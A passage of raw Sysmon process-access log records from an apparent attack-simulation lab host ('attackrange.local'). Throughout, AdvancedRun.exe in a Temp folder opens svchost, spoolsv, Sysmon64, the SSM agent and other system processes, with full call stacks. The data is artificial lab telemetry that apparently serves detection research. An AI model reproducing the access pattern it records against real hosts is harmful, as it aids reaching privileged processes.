Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063650Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.913{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063649Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.913{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063648Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.913{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004063647Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.912{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063646Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.910{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063645Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.910{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063644Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.909{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063643Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.909{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063642Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.908{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063641Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.908{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004063640Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.906{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004063639Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.906{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063638Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.906{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004063637Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.905{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004063636Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.905{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004063635Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.905{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004063634Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 